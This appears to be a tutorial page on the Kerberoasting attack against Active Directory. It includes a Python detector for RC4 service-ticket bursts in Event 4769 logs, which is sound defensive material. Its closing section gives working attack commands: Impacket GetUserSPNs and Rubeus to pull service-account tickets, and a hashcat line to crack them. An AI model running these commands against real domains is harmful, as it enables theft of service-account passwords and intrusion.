Kerberoasting
About the Attack
When a client requests a service ticket from the DC in order to access a resource hosted under an SPN, the DC performs no authorization check before issuing it: any authenticated domain user can request a ticket for any SPN. The service ticket (TGS) is encrypted with the service account's password hash, so we obtain the ticket and brute-force that hash offline. This is why the technique is called Kerberoasting.
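The same mechanism is what a defender watches for: every ticket request in the step above lands on the domain controller as Windows Security Event ID 4769 (a Kerberos service ticket was requested), and the tooling below asks for RC4 (TicketEncryptionType 0x17) tickets by default, so one account requesting RC4 tickets for many distinct service accounts in a short window is the classic signal. The following is an added detection example, not code from the original page; it assumes 4769 events have already been exported as dicts with the standard EventData field names, and the sample events are constructed.

```python
# Added example (not part of the original page): flag likely Kerberoasting activity
# in exported Windows Security Event ID 4769 records.
# Assumptions: each event is a dict carrying the 4769 EventData fields
# (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status).
from collections import defaultdict

RC4_HMAC = "0x17"          # TicketEncryptionType for RC4-HMAC, the etype Kerberoasting tools request
IGNORED_SERVICES = {"krbtgt"}  # krbtgt tickets are TGT (re)issues, not SPN service tickets

# Constructed sample events, not real telemetry. "alice" requests RC4 tickets for three
# different service accounts from one host; "bob" makes one ordinary AES (0x12) request.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9", "Status": "0x0"},
]


def rc4_service_ticket_requests(events):
    """Map each requesting user to the set of service accounts it obtained RC4 tickets for.

    Only successful (Status 0x0) 4769 events with RC4 encryption count. Machine accounts
    (names ending in '$') are skipped: their passwords are long and random, so a ticket
    for them is not crackable and is not what Kerberoasting targets.
    """
    by_user = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue
        if str(e.get("TicketEncryptionType", "")).lower() != RC4_HMAC:
            continue
        svc = e.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() in IGNORED_SERVICES:
            continue
        by_user[e["TargetUserName"]].add(svc)
    return dict(by_user)


def kerberoast_suspects(events, threshold=3):
    """Users that pulled RC4 service tickets for `threshold` or more distinct accounts.

    Returns {user: sorted list of service accounts}. The threshold is a tuning knob:
    a single RC4 request can be legitimate (legacy service), a burst across many SPNs
    rarely is.
    """
    return {
        user: sorted(services)
        for user, services in rc4_service_ticket_requests(events).items()
        if len(services) >= threshold
    }


if __name__ == "__main__":
    for user, services in kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

Feeding real exports in is a matter of replacing SAMPLE_EVENTS with the parsed 4769 records; the threshold and the time window you group by are the two knobs to tune against your own baseline of legacy RC4 usage.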
Gear Up (Prereqs)
We need the following information in order to perform this attack:
- Credentials for any domain user, i.e. User:Password
- Domain Controller IP
Using Impacket
This command is used when launching the attack from Kali Linux (the Kali wrapper name is case-sensitive; you will be prompted for the user's password):
impacket-GetUserSPNs -request -dc-ip $IP domain.com/user
Using Rubeus
Rubeus.exe kerberoast /outfile:hashes.kerberoast
Crack the Collected Hash
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Mode 13100 is for RC4-encrypted (etype 23) TGS-REP hashes, which is the format both tools above produce. We can also use a custom rule file or any other suitable wordlist.